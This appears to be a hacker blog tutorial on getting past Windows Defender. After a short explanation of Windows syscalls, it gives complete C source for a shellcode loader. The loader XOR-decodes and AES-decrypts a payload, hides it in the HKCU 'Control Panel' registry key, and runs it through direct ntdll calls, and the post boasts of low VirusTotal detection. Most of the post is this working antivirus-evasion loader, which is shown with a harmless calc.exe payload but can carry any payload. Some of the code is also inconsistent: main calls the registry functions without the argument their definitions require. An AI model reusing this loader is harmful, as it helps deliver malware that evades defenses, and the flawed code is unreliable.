Lately I’ve been poking around at Windows internals and writing low-level code. This morning I thought I’d try to bypass Windows Defender and get a low score on VirusTotal.

One trick I’ve been playing with is writing shellcode to the Windows registry to keep things “fileless.” It’s not super fancy, but it’s kind of neat. I combined that with indirect syscalls and some cryptographic routines to get Windows Defender to chill out.

“Syscalls”

Windows gives each user-mode application a block of virtual addresses. This is known as the user space of that application. The other large block of addresses, known as system space or kernel space, cannot be directly accessed by the application.

To request a service from the kernel (like reading a file or opening a process), a user-mode program must make a system call with the syscall instruction. Before executing syscall, it tells the kernel which function it needs by placing a System Service Number (SSN) in the eax register.

The SSN is basically an index into a table of kernel routines (the system service dispatch table, usually just called the SSDT), where each number selects a different kernel function. For example:

  • eax = 0 -> Calls the 1st function in the table
  • eax = 1 -> Calls the 2nd function
  • eax = 2 -> Calls the 3rd, and so on.

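Conceptually, the kernel picks the SSN-th entry of that table: function_address = SSDT[SSN]. On x64 the lookup is slightly more indirect. Each entry in the table (KiServiceTable) is a 32-bit value whose upper 28 bits hold the routine's offset from the table base (the low 4 bits count the arguments passed on the stack), so the kernel computes: function_address = KiServiceTable + (KiServiceTable[SSN] >> 4)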

tl;dr: when a syscall instruction runs, the CPU switches from user mode to kernel mode, and the system call handler uses the SSN in eax to execute the correct function.
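To make the table lookup concrete, here's a small user-mode C analogy. It's a sketch, not kernel code. The service functions, the table, and the helper names (dispatch, decode_x64_entry, stack_arg_count) are all hypothetical. Only the x64 entry encoding mirrors what the real kernel does.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins for kernel routines: ordinary user-mode functions. */
typedef long (*service_fn)(void);

static long svc_first(void)  { return 100; }
static long svc_second(void) { return 101; }
static long svc_third(void)  { return 102; }

/* Analogy of the dispatch table: the "SSN" is just an array index. */
static const service_fn service_table[] = {
    svc_first,   /* SSN 0 -> 1st function */
    svc_second,  /* SSN 1 -> 2nd function */
    svc_third,   /* SSN 2 -> 3rd function */
};

/* Look up and call the routine for an SSN, rejecting out-of-range
   numbers (the real kernel also refuses invalid service numbers). */
static long dispatch(uint32_t ssn) {
    size_t count = sizeof(service_table) / sizeof(service_table[0]);
    if (ssn >= count) {
        return -1;
    }
    return service_table[ssn]();
}

/* x64 encoding: each 32-bit entry holds (offset_from_table_base << 4)
   | stack_arg_count. The routine address is the base plus entry >> 4
   (the kernel uses an arithmetic shift, so offsets can be negative). */
static uintptr_t decode_x64_entry(uintptr_t table_base, int32_t entry) {
    return table_base + (uintptr_t)(intptr_t)(entry >> 4);
}

/* The low 4 bits: how many arguments the service takes on the stack. */
static unsigned stack_arg_count(int32_t entry) {
    return (unsigned)(entry & 0xF);
}
```

For example, dispatch(1) calls the second routine. An entry of 0x00012343 decodes to the table base plus 0x1234, with 3 arguments passed on the stack.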

[Figure: user mode vs. kernel mode. Image from Microsoft Press Store by Pearson]

For example, we can see this in action if I write some code in userland that uses the Win32 API functions CreateFileA and WriteFile:

#include <stdio.h>
#include <string.h>   // strlen
#include <windows.h>

int main() {
    char path[MAX_PATH];
    char filename[MAX_PATH];
    HANDLE hFile;
    DWORD bytesWritten;

    // Width limits (MAX_PATH - 1) keep scanf from overflowing the buffers
    printf("Enter the path: ");
    if (scanf("%259s", path) != 1) {
        return 1;
    }

    printf("Enter the filename: ");
    if (scanf("%259s", filename) != 1) {
        return 1;
    }

    char fullPath[MAX_PATH];
    snprintf(fullPath, sizeof(fullPath), "%s\\%s", path, filename);

    // Win32 call: eventually reaches the NtCreateFile stub in ntdll.dll
    hFile = CreateFileA(fullPath, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD error = GetLastError();
        LPSTR errorMsg = NULL;
        // FormatMessageA allocates the buffer; we release it with LocalFree
        FormatMessageA(
            FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
            NULL,
            error,
            0,
            (LPSTR)&errorMsg,
            0,
            NULL
        );
        printf("Failed to create the file (error %lu): %s\n", error,
               errorMsg ? errorMsg : "unknown error");
        LocalFree(errorMsg);
        return 1;
    }

    const char* content = "Noted";
    // Win32 call: eventually reaches the NtWriteFile stub in ntdll.dll
    if (!WriteFile(hFile, content, (DWORD)strlen(content), &bytesWritten, NULL)) {
        printf("Failed to write to the file (error %lu).\n", GetLastError());
        CloseHandle(hFile);
        return 1;
    }

    CloseHandle(hFile);

    printf("File created successfully: %s\n", fullPath);

    return 0;
}

This code calls the Win32 API functions CreateFileA and WriteFile. But if we compile it and step through it in a debugger or disassembler, we’ll see something else under the hood. These functions end up invoking NtCreateFile and NtWriteFile, the Native API stubs in ntdll.dll that set up registers and issue the actual syscall.

CreateFileA is a high-level wrapper over the Native API. It handles things like converting the ANSI path to Unicode and translating the Win32 flags. It then delegates to NtCreateFile, which prepares the registers and triggers the syscall.

Once the CPU is in kernel mode, the system call handler resolves the SSN through the service descriptor table. That table points to the array of kernel system service routines, which x64 stores as compressed offsets:

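// Illustrative layout (undocumented; field names vary between sources)
typedef struct _SYSTEM_SERVICE_TABLE {
    PVOID     ServiceTableBase;        // KiServiceTable: one entry per SSN
    PVOID     ServiceCounterTableBase; // per-service call counters (normally NULL)
    ULONG_PTR NumberOfServices;        // how many routines the table defines
    PVOID     ParamTableBase;          // argument byte counts per service
} SYSTEM_SERVICE_TABLE;

typedef struct tagSERVICE_DESCRIPTOR_TABLE {
    SYSTEM_SERVICE_TABLE nt;     // ntoskrnl services: the SSDT itself
    SYSTEM_SERVICE_TABLE win32k; // win32k.sys (GUI) services, filled in the "shadow" table
    SYSTEM_SERVICE_TABLE sst3;   // unused
    SYSTEM_SERVICE_TABLE sst4;   // unused
} SERVICE_DESCRIPTOR_TABLE;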

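So the ntdll.dll stubs don’t implement anything themselves. Each one loads its SSN into eax and executes syscall, and the kernel then dispatches to its own NtCreateFile or NtWriteFile routine. In user mode, the Zw* and Nt* exports of ntdll.dll are the same stubs. In the NtWriteFile stub below, the SSN is 8, although SSNs can change between Windows builds. The mov r10,rcx preserves the first argument, because syscall overwrites rcx with the return address. The test against 7FFE0308 checks a flag in KUSER_SHARED_DATA that, when set, sends the call down the legacy int 2Eh path instead of syscall.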

//snipped
mov r10,rcx                     | NtWriteFile
mov eax,8                       |
test byte ptr ds:[7FFE0308],1   |
jne ntdll.7FFF055AEE55          |
syscall                         |
ret                   

In this blog post, we’ll call the Native API functions in ntdll.dll directly, resolving their addresses at runtime and skipping the Win32 layer. Strictly speaking, this isn’t an indirect syscall yet, because the calls still go through ntdll’s own stubs. In a future blog post, we’ll cover making some changes to our setup to further unhook these functions for potentially increased stealth.

For You and Me

By default, Windows Defender and other security telemetry closely monitor much of what happens in user mode. So calling the familiar Win32 APIs to do anything interesting can make a program stick out, in a bad way.

To improve our chances of flying under the radar, we can skip the Win32 wrappers and call the Native API functions in ntdll.dll directly, which in turn make the syscalls into the kernel.

But to do this, we’ll need some initial declarations: the type definitions for the Native API functions and the structures they take. We start with _PS_ATTRIBUTE and _PS_ATTRIBUTE_LIST, which describe attributes for process and thread creation[1]. We also need UNICODE_STRING for Unicode strings, OBJECT_ATTRIBUTES for object attributes, and CLIENT_ID for identifying processes and threads.

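We also define function-pointer types for the Native API calls we’ll make:
- pNtAllocateVirtualMemory, to allocate memory[2]
- pNtCreateThreadEx, to spin up a new thread[3]
- pNtWaitForSingleObject, to wait for that thread
- pNtProtectVirtualMemory, pNtFreeVirtualMemory, and pNtClose

GetNtdllFunction looks each one up by name in the already-loaded ntdll.dll.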

#include <windows.h>
#include <stdio.h>
#include <Lmcons.h> // for UNLEN
#include <stdlib.h>
#include <bcrypt.h>
#pragma comment(lib, "bcrypt.lib")

typedef struct _PS_ATTRIBUTE {
    ULONG Attribute;
    SIZE_T Size;
    union {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST {
    SIZE_T TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID {
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

// Define prototypes with proper calling convention
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

typedef NTSTATUS(NTAPI* pNtProtectVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T NumberOfBytesToProtect,
    ULONG NewAccessProtection,
    PULONG OldAccessProtection
    );

typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ProcessHandle,
    PVOID StartRoutine,
    PVOID Argument,
    ULONG CreateFlags,
    SIZE_T ZeroBits,
    SIZE_T StackSize,
    SIZE_T MaximumStackSize,
    PPS_ATTRIBUTE_LIST AttributeList
    );

typedef NTSTATUS(NTAPI* pNtWaitForSingleObject)(
    HANDLE Handle,
    BOOLEAN Alertable,
    PLARGE_INTEGER Timeout
    );

typedef NTSTATUS(NTAPI* pNtFreeVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG FreeType
    );

typedef NTSTATUS(NTAPI* pNtClose)(
    HANDLE Handle
    );

// Function to get NTDLL function address
PVOID GetNtdllFunction(LPCSTR FunctionName) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        return NULL;
    }
    return GetProcAddress(hNtdll, FunctionName);
}

To reiterate the point here: all of this is to avoid calling Win32 APIs that are more heavily monitored by products like Windows Defender. For example, a call to CreateThread or CreateRemoteThread might stick out. So instead of calling the Win32 API, we call NtCreateThreadEx through a pointer of type pNtCreateThreadEx.

Next we need some shellcode. This is just a simple payload that launches calc.exe.

Side note: I’ve already XOR’d the payload before embedding it in the program. We’ll reverse the XOR just before execution.

So, beyond our shellcode, we’ll use the following pieces: an AES encryption routine, an AES decryption routine, an XOR decoding routine, and the Native API calls.

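We derive our encryption key from the username of the current user. If the username is shorter than 16 bytes, we fill the rest of the key with incrementing padding bytes (0x01, 0x02, ...). The length that GetUserNameA returns includes the terminating null, so that null byte also ends up in the key. We follow Microsoft’s conventions for using the BCrypt API[4].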

const BYTE shellcode[] = {
    0xb7, 0x03, 0xc8, 0xaf, 0xbb, 0xa3, 0x8b, 0x4b, 0x4b, 0x4b, 0x0a, 0x1a, 0x0a, 0x1b, 0x19, 0x1a, 
    0x1d, 0x03, 0x7a, 0x99, 0x2e, 0x03, 0xc0, 0x19, 0x2b, 0x03, 0xc0, 0x19, 0x53, 0x03, 0xc0, 0x19, 
    0x6b, 0x03, 0xc0, 0x39, 0x1b, 0x03, 0x44, 0xfc, 0x01, 0x01, 0x06, 0x7a, 0x82, 0x03, 0x7a, 0x8b, 
    0xe7, 0x77, 0x2a, 0x37, 0x49, 0x67, 0x6b, 0x0a, 0x8a, 0x82, 0x46, 0x0a, 0x4a, 0x8a, 0xa9, 0xa6, 
    0x19, 0x0a, 0x1a, 0x03, 0xc0, 0x19, 0x6b, 0xc0, 0x09, 0x77, 0x03, 0x4a, 0x9b, 0xc0, 0xcb, 0xc3, 
    0x4b, 0x4b, 0x4b, 0x03, 0xce, 0x8b, 0x3f, 0x2c, 0x03, 0x4a, 0x9b, 0x1b, 0xc0, 0x03, 0x53, 0x0f, 
    0xc0, 0x0b, 0x6b, 0x02, 0x4a, 0x9b, 0xa8, 0x1d, 0x03, 0xb4, 0x82, 0x0a, 0xc0, 0x7f, 0xc3, 0x03, 
    0x4a, 0x9d, 0x06, 0x7a, 0x82, 0x03, 0x7a, 0x8b, 0xe7, 0x0a, 0x8a, 0x82, 0x46, 0x0a, 0x4a, 0x8a, 
    0x73, 0xab, 0x3e, 0xba, 0x07, 0x48, 0x07, 0x6f, 0x43, 0x0e, 0x72, 0x9a, 0x3e, 0x93, 0x13, 0x0f, 
    0xc0, 0x0b, 0x6f, 0x02, 0x4a, 0x9b, 0x2d, 0x0a, 0xc0, 0x47, 0x03, 0x0f, 0xc0, 0x0b, 0x57, 0x02, 
    0x4a, 0x9b, 0x0a, 0xc0, 0x4f, 0xc3, 0x03, 0x4a, 0x9b, 0x0a, 0x13, 0x0a, 0x13, 0x15, 0x12, 0x11, 
    0x0a, 0x13, 0x0a, 0x12, 0x0a, 0x11, 0x03, 0xc8, 0xa7, 0x6b, 0x0a, 0x19, 0xb4, 0xab, 0x13, 0x0a, 
    0x12, 0x11, 0x03, 0xc0, 0x59, 0xa2, 0x1c, 0xb4, 0xb4, 0xb4, 0x16, 0x03, 0xf1, 0x4a, 0x4b, 0x4b, 
    0x4b, 0x4b, 0x4b, 0x4b, 0x4b, 0x03, 0xc6, 0xc6, 0x4a, 0x4a, 0x4b, 0x4b, 0x0a, 0xf1, 0x7a, 0xc0, 
    0x24, 0xcc, 0xb4, 0x9e, 0xf0, 0xbb, 0xfe, 0xe9, 0x1d, 0x0a, 0xf1, 0xed, 0xde, 0xf6, 0xd6, 0xb4, 
    0x9e, 0x03, 0xc8, 0x8f, 0x63, 0x77, 0x4d, 0x37, 0x41, 0xcb, 0xb0, 0xab, 0x3e, 0x4e, 0xf0, 0x0c, 
    0x58, 0x39, 0x24, 0x21, 0x4b, 0x12, 0x0a, 0xc2, 0x91, 0xb4, 0x9e, 0x28, 0x2a, 0x27, 0x28, 0x65, 
    0x2e, 0x33, 0x2e, 0x4b
};

const DWORD shellcodeSize = sizeof(shellcode);

// AES Configuration
#define AES_KEY_LENGTH 16  // 128-bit AES
#define AES_BLOCK_SIZE 16

// Helper function to generate encryption key from user environment
BOOL GenerateKeyFromEnvironment(BYTE* key, DWORD keySize) {
    CHAR username[UNLEN + 1];
    DWORD usernameLen = UNLEN + 1;

    if (!GetUserNameA(username, &usernameLen)) {
        printf("Failed to get username: %d\n", GetLastError());
        return FALSE;
    }

    BYTE padding = 0x01;
    for (DWORD i = 0; i < keySize; i++) {
        if (i < usernameLen) {
            key[i] = (BYTE)username[i];
        }
        else {
            key[i] = padding++;
        }
    }
    return TRUE;
}

// AES Encryption Function
BOOL AESEncrypt(const BYTE* plaintext, DWORD plaintextSize, const BYTE* key,
    BYTE** ciphertext, DWORD* ciphertextSize) {
    BCRYPT_ALG_HANDLE hAlgorithm = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    NTSTATUS status;

    // Open AES provider
    status = BCryptOpenAlgorithmProvider(&hAlgorithm, BCRYPT_AES_ALGORITHM,
        NULL, 0);
    if (status != 0) {
        printf("BCryptOpenAlgorithmProvider failed: 0x%x\n", status);
        return FALSE;
    }

    // Set ECB mode 
    status = BCryptSetProperty(hAlgorithm, BCRYPT_CHAINING_MODE,
        (BYTE*)BCRYPT_CHAIN_MODE_ECB,
        sizeof(BCRYPT_CHAIN_MODE_ECB), 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptSetProperty failed: 0x%x\n", status);
        return FALSE;
    }

    // Create key handle
    status = BCryptGenerateSymmetricKey(hAlgorithm, &hKey, NULL, 0,
        (BYTE*)key, AES_KEY_LENGTH, 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptGenerateSymmetricKey failed: 0x%x\n", status);
        return FALSE;
    }

    // Get output buffer size
    DWORD cbCiphertext = 0;
    status = BCryptEncrypt(hKey, (BYTE*)plaintext, plaintextSize, NULL,
        NULL, 0, NULL, 0, &cbCiphertext, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptEncrypt size check failed: 0x%x\n", status);
        return FALSE;
    }

    // Allocate ciphertext buffer
    *ciphertext = (BYTE*)malloc(cbCiphertext);
    if (!*ciphertext) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("Memory allocation failed\n");
        return FALSE;
    }

    // Perform encryption
    status = BCryptEncrypt(hKey, (BYTE*)plaintext, plaintextSize, NULL,
        NULL, 0, *ciphertext, cbCiphertext,
        ciphertextSize, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        free(*ciphertext);
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptEncrypt failed: 0x%x\n", status);
        return FALSE;
    }

    // Cleanup
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlgorithm, 0);
    return TRUE;
}

If all goes well, we succeed in deriving a key and encrypting the shellcode. But we also need an AES decryption routine. The use of AES routines to keep our payload safe further reduces the likelihood of Windows Defender catching us.

// AES Decryption Function
BOOL AESDecrypt(const BYTE* ciphertext, DWORD ciphertextSize, const BYTE* key,
    BYTE** plaintext, DWORD* plaintextSize) {
    BCRYPT_ALG_HANDLE hAlgorithm = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    NTSTATUS status;

    // Open AES provider
    status = BCryptOpenAlgorithmProvider(&hAlgorithm, BCRYPT_AES_ALGORITHM,
        NULL, 0);
    if (status != 0) {
        printf("BCryptOpenAlgorithmProvider failed: 0x%x\n", status);
        return FALSE;
    }

    // Set ECB mode
    status = BCryptSetProperty(hAlgorithm, BCRYPT_CHAINING_MODE,
        (BYTE*)BCRYPT_CHAIN_MODE_ECB,
        sizeof(BCRYPT_CHAIN_MODE_ECB), 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptSetProperty failed: 0x%x\n", status);
        return FALSE;
    }

    // Create key handle
    status = BCryptGenerateSymmetricKey(hAlgorithm, &hKey, NULL, 0,
        (BYTE*)key, AES_KEY_LENGTH, 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptGenerateSymmetricKey failed: 0x%x\n", status);
        return FALSE;
    }

    // Get output buffer size
    DWORD cbPlaintext = 0;
    status = BCryptDecrypt(hKey, (BYTE*)ciphertext, ciphertextSize, NULL,
        NULL, 0, NULL, 0, &cbPlaintext, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptDecrypt size check failed: 0x%x\n", status);
        return FALSE;
    }

    // Allocate plaintext buffer
    *plaintext = (BYTE*)malloc(cbPlaintext);
    if (!*plaintext) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("Memory allocation failed\n");
        return FALSE;
    }

    // Perform decryption
    status = BCryptDecrypt(hKey, (BYTE*)ciphertext, ciphertextSize, NULL,
        NULL, 0, *plaintext, cbPlaintext,
        plaintextSize, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        free(*plaintext);
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptDecrypt failed: 0x%x\n", status);
        return FALSE;
    }

    // Cleanup
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlgorithm, 0);
    return TRUE;
}

However, even after this, we’ll make one final effort to subvert Windows Defender—namely, by writing our encrypted payload to the Windows registry, so as to remain stealthy, fileless, and potentially persistent.

In other words, the payload is never written to disk as a standalone file. It sits encrypted in the registry, which Windows itself persists in the user’s NTUSER.DAT hive. It is only decrypted and XOR-decoded in memory, right before execution.

But how can we read from and write to the Windows registry? We’ll need the winreg API from Microsoft[5].

First we’ll use RegOpenKeyExA and RegSetValueExA, since we want to write to the Windows registry. But we need somewhere to write! We’ll use the Control Panel key under HKEY_CURRENT_USER, with a value named after the current user.

So, before we read or write, we get the username from the current environment and use it as the value name. That way, the data ends up at HKEY_CURRENT_USER\Control Panel\<username>.

And afterward, we use RegQueryValueExA to do the opposite operation, querying and reading the registry key we’ve written.

BOOL writeRegistry(const BYTE* data, DWORD dataSize, const char* valueName) {
    HKEY hKey;
    LONG status = RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel", 0, KEY_SET_VALUE, &hKey);
    if (status != ERROR_SUCCESS) {
        printf("Error opening key: %d\n", GetLastError());
        return FALSE;
    }

    status = RegSetValueExA(hKey, valueName, 0, REG_BINARY, data, dataSize);
    RegCloseKey(hKey);

    if (status != ERROR_SUCCESS) {
        printf("Error writing value: %d\n", GetLastError());
        return FALSE;
    }

    return TRUE;
}

BOOL readRegistry(BYTE** buffer, DWORD* bytesRead, const char* valueName) {
    HKEY hKey;
    LONG status = RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel", 0, KEY_READ, &hKey);
    if (status != ERROR_SUCCESS) {
        printf("Error opening key: %d\n", GetLastError());
        return FALSE;
    }

    DWORD type, size = 0;
    status = RegQueryValueExA(hKey, valueName, NULL, &type, NULL, &size);
    if (status != ERROR_SUCCESS) {
        RegCloseKey(hKey);
        printf("Error querying value size: %d\n", GetLastError());
        return FALSE;
    }

    *buffer = (BYTE*)malloc(size);
    if (!*buffer) {
        RegCloseKey(hKey);
        printf("Memory allocation failed\n");
        return FALSE;
    }

    status = RegQueryValueExA(hKey, valueName, NULL, &type, *buffer, &size);
    RegCloseKey(hKey);

    if (status != ERROR_SUCCESS) {
        free(*buffer);
        printf("Error reading value: %d\n", GetLastError());
        return FALSE;
    }

    *bytesRead = size;
    return TRUE;
}

Before we wrap things up with our shellcode execution and main functions, we need a small gadget to decode the payload, since the payload in this script was one I XOR’d beforehand.

void XORDecode(BYTE* data, DWORD dataSize, BYTE key) {
    for (DWORD i = 0; i < dataSize; i++) {
        data[i] ^= key;
    }
}

Alright, now we’re close. We need to make use of the Native API type definitions we created earlier.

We get function pointers to allocate and protect virtual memory, to create a new thread, and to wait for it to finish. Our epilogue uses NtClose and NtFreeVirtualMemory to release the thread handle and the memory when we’re done.

So, fundamentally, we copy the decrypted, XOR-decoded shellcode into memory allocated as read-write, then flip it to read-execute before running it, all via ntdll calls.

The shellcode runs on a new thread in our current process, and we wait for that thread to finish.

The calc shellcode itself launches calc.exe as a separate process. After this, we clean up our memory and bail out cleanly.

void ExecuteShellcode(BYTE* shellcode, SIZE_T size) {
    XORDecode(shellcode, size, 'K');
    // Get function pointers
    pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetNtdllFunction("NtAllocateVirtualMemory");
    pNtProtectVirtualMemory NtProtectVirtualMemory = (pNtProtectVirtualMemory)GetNtdllFunction("NtProtectVirtualMemory");
    pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetNtdllFunction("NtCreateThreadEx");
    pNtWaitForSingleObject NtWaitForSingleObject = (pNtWaitForSingleObject)GetNtdllFunction("NtWaitForSingleObject");
    pNtFreeVirtualMemory NtFreeVirtualMemory = (pNtFreeVirtualMemory)GetNtdllFunction("NtFreeVirtualMemory");
    pNtClose NtClose = (pNtClose)GetNtdllFunction("NtClose");

    if (!NtAllocateVirtualMemory || !NtProtectVirtualMemory || !NtCreateThreadEx ||
        !NtWaitForSingleObject || !NtFreeVirtualMemory || !NtClose) {
        printf("Failed to get NTDLL function pointers\n");
        return;
    }

    PVOID execMemory = NULL;
    SIZE_T regionSize = size;
    ULONG oldProtect;

    // Allocate memory
    NTSTATUS status = NtAllocateVirtualMemory(
        GetCurrentProcess(),
        &execMemory,
        0,
        &regionSize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE
    );

    if (status != 0) {
        printf("NtAllocateVirtualMemory failed: 0x%x\n", status);
        return;
    }

    // Copy shellcode
    memcpy(execMemory, shellcode, size);

    // Change protection
    status = NtProtectVirtualMemory(
        GetCurrentProcess(),
        &execMemory,
        &size,
        PAGE_EXECUTE_READ,
        &oldProtect
    );

    if (status != 0) {
        printf("NtProtectVirtualMemory failed: 0x%x\n", status);
        NtFreeVirtualMemory(GetCurrentProcess(), &execMemory, &size, MEM_RELEASE);
        return;
    }

    // Create thread
    HANDLE hThread = NULL;
    status = NtCreateThreadEx(
        &hThread,
        THREAD_ALL_ACCESS,
        NULL,
        GetCurrentProcess(),
        (LPTHREAD_START_ROUTINE)execMemory,
        NULL,
        0,
        0,
        0,
        0,
        NULL
    );

    if (status != 0) {
        printf("NtCreateThreadEx failed: 0x%x\n", status);
        NtFreeVirtualMemory(GetCurrentProcess(), &execMemory, &size, MEM_RELEASE);
        return;
    }

    // Wait for thread
    status = NtWaitForSingleObject(hThread, FALSE, NULL);
    if (status != 0) {
        printf("NtWaitForSingleObject failed: 0x%x\n", status);
    }

    // Cleanup
    NtClose(hThread);
    NtFreeVirtualMemory(GetCurrentProcess(), &execMemory, &size, MEM_RELEASE);
}

So, to recap and tie it all together:

  1. We derive the key for our AES routines from the username of the account the process runs under.
  2. We encrypt our shellcode and write it out to the Windows registry.
  3. We read it back out and decrypt it with the AES decryption routine, then call the function that actually executes the shellcode.
  4. Finally, in ExecuteShellcode we reverse the XOR just before running the shellcode. We spin up a new thread and wait on it with NtWaitForSingleObject. If all goes well, we get a fresh calc.exe and Windows Defender doesn’t yell at us!

int main() {
    BYTE key[AES_KEY_LENGTH];
    if (!GenerateKeyFromEnvironment(key, AES_KEY_LENGTH)) {
        return 1;
    }

    // Encrypt payload
    BYTE* encryptedShellcode = NULL;
    DWORD encryptedSize = 0;
    if (!AESEncrypt(shellcode, shellcodeSize, key, &encryptedShellcode, &encryptedSize)) {
        return 1;
    }

    // Write to registry
    if (!writeRegistry(encryptedShellcode, encryptedSize)) {
        free(encryptedShellcode);
        return 1;
    }
    free(encryptedShellcode);
    printf("Successfully wrote encrypted payload to registry\n");

    // Read from registry
    BYTE* readBuffer = NULL;
    DWORD bytesRead;
    if (!readRegistry(&readBuffer, &bytesRead)) {
        return 1;
    }

    // Decrypt payload
    BYTE* decryptedShellcode = NULL;
    DWORD decryptedSize;
    if (!AESDecrypt(readBuffer, bytesRead, key, &decryptedShellcode, &decryptedSize)) {
        free(readBuffer);
        return 1;
    }
    free(readBuffer);

    // Verify decrypted size matches original
    if (decryptedSize != shellcodeSize) {
        printf("Decrypted size mismatch! Expected %d, got %d\n", shellcodeSize, decryptedSize);
        free(decryptedShellcode);
        return 1;
    }

    // Execute the shellcode
    printf("Executing decrypted payload...\n");
    ExecuteShellcode(decryptedShellcode, decryptedSize);
    free(decryptedShellcode);

    return 0;
}

Alright, let’s check the score board. Are we able to successfully read and write to the registry and execute shellcode without Windows Defender complaining?

[Screenshot: Calculator]

Looks good. Let’s see how many antivirus vendors detect our code. Ahh, only ten out of 72! That’s not bad. But we could also do better!

[Screenshot: VirusTotal]

Next post!

Proof of concept on Github: RegistryGhost